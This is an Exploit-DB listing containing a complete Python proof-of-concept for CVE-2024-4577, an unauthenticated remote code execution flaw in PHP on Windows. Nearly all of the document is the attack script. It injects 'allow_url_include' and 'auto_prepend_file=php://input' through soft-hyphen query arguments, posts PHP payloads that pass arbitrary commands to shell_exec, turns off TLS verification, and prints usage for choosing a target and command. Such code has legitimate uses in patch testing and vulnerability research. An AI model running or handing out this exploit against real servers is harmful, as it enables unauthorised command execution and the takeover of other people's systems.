PHP < 8.3.8 - Remote Code Execution (Unauthenticated) (Windows)

EDB-ID:

52047

CVE:

N/A




Platform:

PHP

Date:

2024-06-14


# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.php.net/downloads.php
# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29
# CVE : CVE-2024-4577

from requests import Request, Session
import sys
import json



def title():
    print('''
    
   _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  |
 | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / / 
 | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /  
 | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /   
  \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                              
                                                                                                                      
                                                                              
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
    ''')   


def exploit(url, command):       
    payloads = {
        '<?php echo "vulnerable"; ?>',
        '<?php echo shell_exec("'+command+'"); ?>' 
    }    
    headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
    'Content-Type': 'application/x-www-form-urlencoded'}
    s = Session()
    for payload in payloads:
        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        req = Request('POST', url, data=payload, headers=headers)
        prepped = req.prepare()
        del prepped.headers['Content-Type']
        resp = s.send(prepped,
        verify=False,
        timeout=15)
        #print(prepped.headers)
        #print(url)
        #print(resp.headers)       
        #print(payload)
        print(resp.status_code)
        print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 2):
        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))        
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2])